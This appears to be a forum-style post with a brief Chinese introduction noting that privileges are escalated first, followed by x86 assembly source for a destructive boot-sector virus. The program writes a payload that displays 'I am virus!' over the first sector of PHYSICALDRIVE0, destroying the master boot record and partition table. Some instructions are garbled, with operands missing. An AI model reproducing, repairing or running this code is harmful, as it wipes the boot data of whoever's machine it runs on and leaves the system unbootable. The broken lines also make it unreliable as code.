来自于很老的代码了
先提权,然后
.586
.model flat, stdcall
locals @@
include useful.inc
extern DeviceIoControl:Proc
.data
dbVirusCode:
db 0b8h, 012h, 000h, 0cdh, 010h, 0bdh, 018h, 07ch
db 0b9h, 018h, 000h, 0b8h, 001h, 013h, 0bbh, 00ch
db 000h, 0bah, 01dh, 00eh, 0cdh, 010h, 0e2h, 0feh
db 'I am virus! Fuck you :-)', 0
dwVirusCodeSize = $ - dbVirusCode
szPhysicalDrive0 db '\\.\PHYSICALDRIVE0', 0
.code
public c entry
entry proc
LOCAL @szBuffer: BYTE
xor ebx, ebx
lea edi, [@szBuffer]
push edi
push edi
xor al, al
mov ecx, 1024
rep stosb
mov esi, offset dbVirusCode
pop edi
push dwVirusCodeSize
pop ecx
rep movsb
pop edi
mov by , 055h
mov by , 0AAh
push ebx
push ebx
push 3 ; OPEN_EXISTING
push ebx
push 3 ; FILE_SHARE_READ or FILE_SHARE_WRITE
push 0c0000000h ; GENERIC_READ or GENERIC_WRITE
push offset szPhysicalDrive0
callw CreateFileA
cmp eax, -1
je @@ExitProc
mov esi, offset DeviceIoControl
push ebx
mov eax, esp
push ebx
push eax
push ebx
push ebx
push ebx
push ebx
push 00090018h ; FSCTL_LOCK_VOLUME
push edi
call esi
mov eax, esp
push ebx
push eax
push 512
lea eax, [@szBuffer]
push eax
push edi
callw WriteFile
mov eax, esp
push ebx
push eax
push ebx
push ebx
push ebx
push ebx
push 0009001ch ; FSCTL_UNLOCK_VOLUME
push edi
call esi
push edi
callw CloseHandle
pop eax
@@ExitProc:
ret
entry endp
end |